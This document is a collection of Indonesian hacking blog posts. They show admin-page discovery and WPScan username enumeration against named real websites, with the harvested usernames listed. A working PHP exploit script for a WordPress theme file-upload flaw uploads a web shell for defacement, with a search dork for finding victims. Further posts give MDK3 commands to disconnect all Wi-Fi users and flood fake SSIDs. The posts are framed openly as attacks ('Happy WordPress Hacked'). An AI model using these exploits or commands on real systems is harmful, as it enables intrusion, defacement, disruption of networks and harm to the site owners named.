Cara Menemukan Page Admin Login Dengan Admin Finder di Kali Linux

Hallo Fans, Nuenomaru disini .-.
untuk artikel hari ini saya akan share cara menemukan page admin login pada sebuah website menggunakan adminfinder Di Terminal Linux OS.
Sebenernya ini Artikel mau Nue Posting kemarin barengan sama Artikel Cara mendapatkan Username Website berBasis CMS WordPress dengan WPScan di Kali Linux, tapi karna mata dah mager, jdi di postnya sekarang aja dah wkwkw :v
Sama kek Tutorial Sebelumnya, disini Nuenomaru memakai Kali Linux, utk para pengguna pinguin lainnya monggo dicoba di terminal2 pinguin kesayangannya <(") xixixhi.


Sebelumnya Download admin findernya:
- 4Shared
- Google Drive TKJ Cyber Art
- SolidFiles

(jika ada salah satu link yang mati, harap lapor di kolom komentar kak)

Lanjoot intip tutorial ;*

Jika tool admin findernya sudah selesai di Download, pindahkan toolnya ke Direktory Root.

Jika sudah, buka terminal Linux & Ketikan perintah:

perl admin_finder.pl

lalu enter dan akan muncul seperti ini

setelah itu masukan website target sobat, untuk mengetahui admin login nya.

disini Nue memakai, contoh : http://suryaphone.co.id/

setelah itu enter dan muncul seperti ini

Disini Nue pilih Nomor 1 atau PHP
kalian bisa memilih sesuka kalian, tapi sih Nue sarankan pilih nomor 1.

Setelah itu Lanjut Enter dan tunggu proses selesai

Done~

Jika sudah selesai menscan cari kata" yang Tulisannya "FOUND"
Itu Berarti nama admin login nya.


contoh : http://suryaphone.co.id/admin/



setelah itu silahkan coba di brower anda.

Mudah kan o.O ?
Stay Cool and Keep Crotz , gaes :'v
Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Go OpenSource Indonesia~
Sekian dan semoga bermanfaat .. terimakasih


source and thanks to: Anherr Blog's





./Nuenomaru

Visit and follow :

FP         : TKJ Cyber Art

G+         : TKJ Cyber Art

youtube : TKJ Cyber Art

BBM      : C0018D1A2

Cara mendapatkan Username Website berBasis CMS WordPress dengan WPScan di Kali Linux

Hallo Fans, Nuenomaru disini .-.
maaf baru bisa posting/share artikel tutorial lagi.
lg sibuk urus masadepan *asiikk wkwkwk

untuk artikel hari ini saya akan share salah satu bug/celah web berbasisCMS Wordpress :D
kali ini Nue akan memberikan tutorial cara mendapatkan Username pada website yang menggunakan CMS Wordpress.

WPScan ini di gunakan untuk mengetahui username pada CMS Wordpress dan juga bisa mengetahui Password, namun jika ingin mengetahui passwordnya harus mempunyai wordlist nya.

yaaachh kayak BruteForce Attack.

WPScan o.O ?? *xixixhi ini tutorial lama sih wkwkw, baru kepikiran buat di post dimarii.

Lansung intip Tutorialnya ;*

Pertama" buka Terminal dan ketik kan

wpscan -u (target) --enumerate u

disini Nue menggunakan target salah satu Universitas, *target bisa kalian ganti dgn target web wordpress anda.
jadi :

 wpscan -u http://unnes.ac.id/ --enumerate u

 

NB: pada --enumerate u , Huruf "U" itu berarti Username, Jika untuk mencari Password ganti aja dengan Huruf "P".

Selanjutnya tunggu hingga scanning nya selesai.

Jika Sudah selesai akan muncul seperti ini.

Done ~

Disini saya menemukan 5 Username, yaitu
- adminin
- em2ka
- riki
- kartika
- sihono

Mudah kan o.O ?
Stay Cool and Keep Crotz , gaes :'v
Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih


source and thanks to: Anherr Blog's





./Nuenomaru

Visit and follow :

FP         : TKJ Cyber Art

G+         : TKJ Cyber Art

youtube : TKJ Cyber Art

BBM      : C0018D1A2

Deface dengan Exploit Wordpress Theme Strange File Upload

Hallo Fans, Nuenomaru disini .-.
maaf baru bisa posting/share artikel tutorial lagi.
lg sibuk urus masadepan *asiikk wkwkwk

untuk artikel hari ini saya akan share salah satu bug/celah web berbasisCMS Wordpress :D
kali ini Nue akan share Exploit Tutorial deface dengan WordPress Theme Strange File Upload ,  etthoo,, ini exploit gak begitu baru loh .. *exploit lama wkwk

hahaha iseng2 aja share kali aja masih crotz  *yang dah master, minggir dlu yak :'(

bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface

- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v ) 

Lansung intip Tutorialnya ;*

Edited By: OepilCore

Exploit Title : Wordpress Theme Strange File Upload / File Deletion

Exploit Author : NULL_Pointer

Contact : https://www.facebook.com/xenith.gianni

Date : 21/09/2014

Github Mirror : https://github.com/nzajt/New-Life-Office/tree/master/dev/wp-content/themes/ut-strange

Version : 3.1

Google Dork : inurl:/wp-content/themes/ut-strange/

Tested on : Linux, Windows 7

--------------------------------------------------------------

Dork: inurl:wp-content/themes/ut-strange/

(sisanya kembangin sendiri mz, biar dpt yg vuln and verawan ;* )

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: /wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php

3. Vulnerability ~ Blank Page

Horee xD ~

4. Buat File Baru Berekstensi .php Contoh utstrange.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn utstrange.php tadi

Code PHP :

<?php
$url = "www.target.co.li/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php"; // put URL Here
$post = array
(
"file_upload" => "@shellpunyalo.php",
"themeroot" => "."
//,"dir"=>"."
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>

(kalo mau pake code HTML bisa ke sini: Touch Me Senpai ;')

5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php

7. jika sukses , akan muncul nama shell sobat di CMD,dan akan keluar lengkap link akses shell ente

8. Shell Akses: 
www.target.co.li/wp-content/themes/ut-strange/addpress/includes/namashell.php

Done xD ~ xixixhi :v

Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))

Gans aned ;*

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih


source and thanks to: Reza Blog | 0 day | aAn




./Nuenomaru

Visit and follow :

FP         : TKJ Cyber Art

G+         : TKJ Cyber Art

youtube : TKJ Cyber Art

BBM      : C0018D1A2

USB Guardian 4.1.0

USB Guardian 4.1.0 | 698KB

USB Guardian is a software application that can prevent your computer from virus infected wicked worm like Conficker (aka Downadup, Downadup and Kido!) That has already spread to more than 9 million computers.

USB Guardian allows you to safely enjoy file sharing using a USB thumb drive to copy files. Movies, MP3s, documents and images can be copied from one computer to another without worrying about getting infected with worms and viruses via USB drive. USB thumb drives have become a commodity and this fact actively exploited by criminals who have developed specific viruses and worms that infected USB storage devices such as thumb drives, cameras and even cell phones.

The interface is very clean and well organized so that one can access all functions with minimal effort.

Download NowTusfilesMedi1fire

Membuat SSID Palsu Dengan MDK3 di Linux

yooo,..

balik lagi bertemu gua #OepilCore disini XD
oke oke oke , setelah di postingan sebelumnya gua share cara buldozer wifi orang kwkwkw~
kali ini gua bakalan share cara membuat ssid palsu dengan mdk3 (lagi) kwkwkw~
*Stress Testing lagih :v
untuk Postingan Sebelumnya, baca dulu aja disitu: Tutorial Memutuskan Connection Wifi dengan MDK3 di Linux
dah ahh ga usah banyak cincong lagi kali ini kwkwkw~ , silahkan liat ya :3

1) oke langsung to the point ajah kwkwkw~
pertama-tama jalankan command

airmon-ng start wlan0

2) setelah itu kita membuat file ssid.list
file ini berisikan nama-nama untuk ssid palsu kita , untuk 1 baris itu 1 ssid
setelah kalian buat, kalian save di folder root kalian

3) yaaa setelah itu kita jalankan mdk3 kita dengan menggunakan command

mdk3 mon0 b -f ssid.list

dannn , Taraaaa~ , sudah berjalan :3 , untuk melihatnya kalian bisa membukan SmartPhone kalian ataupun leppy teman kalian , tapi ingat jika kalian sudah masuk kedalam wifi ini untuk masuk kedalam wifi yang benar kalian akan tetap tertendang kwkwkw~ , maka harus restart dulu XD

kwkwkwkw~ , dan untuk memberhentikannya kalian bisa menekan tombol ctrl+c ,

oke oke semuanya :3 , sekian dulu ya dari mimin #OepilCore ,
kwkwkw~ tetap semangArt dan belajar :3  , hehehe~ oke semuanya ^^

stay cool and keep crootzz~ ,
Salam para penjinak pinguin :v , Viva Real Tux Warrior Gaes :'v wkkwkwkw
#SalamLestari andd paypayyy~

#OepilCore

Visit and follow :

FP         : TKJ Cyber Art

G+         : TKJ Cyber Art

youtube : TKJ Cyber Art

BBM      : C0018D1A2

Tutorial Memutuskan Connection Wifi dengan MDK3 di Linux

haii semua ,
kembali lagi bersama saya #OepilCore , yap kali ini gua bakalan Re-share tentang MDK3 , oke tool MDK3 ini tuh selain bisa untuk mengcut koneksi wifi kita juga bisa untuk membuat SSID Palsu kwkwkw, tool ini adalah salah satu Jenis dari metode Stress Testing, *iyalah bikin Stress Para pengguna wifi/satu jaringan yang laen awkawk~
di tutorial ini saya memakai BackBox Linux, utk sobat, silahkan praktekan di Linux kesayangan anda~

jadi untuk kali ini gua bakalan share tentang cara memutuskan seluruh user yang terkoneksi dengan wifi , kwkwk~ bisa dibilang buldozer deh ~

jadi di tool ini , lu bisa memutuskan seluruh koneksi wifi tanpa membuat mereka kembali masuk XD meskipun ganti Mac Address kwkwkw~

oke langsung simak ajah ya heheh~

oke oke , pertama tama kalian harus memiliki tool MDK3 , ini bisa kalian cari di mbah google hehehe~

oke next ke berikutnya ,

1) Kalian gunakan airmon-ng untuk melihat device yang kita gunakan , dan selebihnya silahkan cek SS *miminnya mulai ngantuk* kwkwkwkw

2) setelah itu kita lihat Mac Address kita agar punya kita tidak ikut terputus saat menggunakan mdk3 , dengan menggunakan ifconfig wlan0 (saya menggunakan wlan0 karena saya menggunakan wifi)

setelah itu kita gunakan command

echo *mac address lu* >> whitelist.txt

itu kita gunakan agar memasukan mac address kita kedalam whitelist.txt , karena nanti mdk3 akan memutuskan semua koneksi yang berada di dalam blacklist.txt , blacklist.txt ini dibuat secara otomatis oleh mdk3 

3) untuk menjalankannya hanya menggunakan command

mdk3 mon0 d -w whitelist.txt

oke jika selesai kalian gunakan , kalian bisa menekan tombol ctrl+c hehehe~

huahahaha ~ oke hanya segitu dulu yang bisa saya berikan , untuk salah dan kurangnya mohon dimaafkan karena saya dan kita disini masih belajar hehhe~ :3
keep try and error ya semuanya ^^ and Stay Cool Keep Crootzz :3

sampai bertemu di postingan berikutnya heheh~
Salam para penjinak pinguin :v , Viva Real Tux Warrior Gaes :'v wkkwkwkw
#SalamLestari and good bye~

#OepilCore

Visit and follow :

FP         : TKJ Cyber Art

G+         : TKJ Cyber Art

youtube : TKJ Cyber Art

BBM      : C0018D1A2